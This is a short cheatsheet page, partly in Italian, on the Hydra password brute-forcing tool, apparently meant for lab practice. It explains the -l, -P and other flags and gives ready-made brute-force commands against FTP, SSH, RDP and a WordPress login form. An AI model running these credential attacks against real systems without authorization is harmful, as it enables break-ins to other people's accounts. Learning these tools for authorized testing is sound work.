Tutorials

Hydra cheatsheet

Hydra è un tool che da la possiblità di eseguire un bruteforce su servizi come ftp o ssh. Un comando di esempio per eseguire un attacco bruteforce con hydra, potrebbe essere questo:  shell

#exploitation#password-cracking

Hydra è un tool che da la possiblità di eseguire un bruteforce su servizi come ftp o ssh. Un comando di esempio per eseguire un attacco bruteforce con hydra, potrebbe essere questo:

shell
hydra -l [username] -P [password-directory] ftp://10.10.230.153
-l = è l'username da utilizzare nell'attacco bruteforce

-P = è la directory della lista di password che andremo ad usare per l'attacco

In fine viene specificato l'indirizzo ip con il servizio da forzare. Esempio:

  • ftp://10.10.73.161
  • ssh://10.10.73.161
L'attacco è rivolto allo stesso indirizzo ip, ma a due servizi diversi.

shell
hydra -P <wordlist> -v <ip> <protocol>
  • Brute force against a protocol of your choice
shell
hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>
  • You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)
shell
hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>
  • Attack a Windows Remote Desktop with a password list
shell
hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
  • Craft a more specific request for Hydra to brute force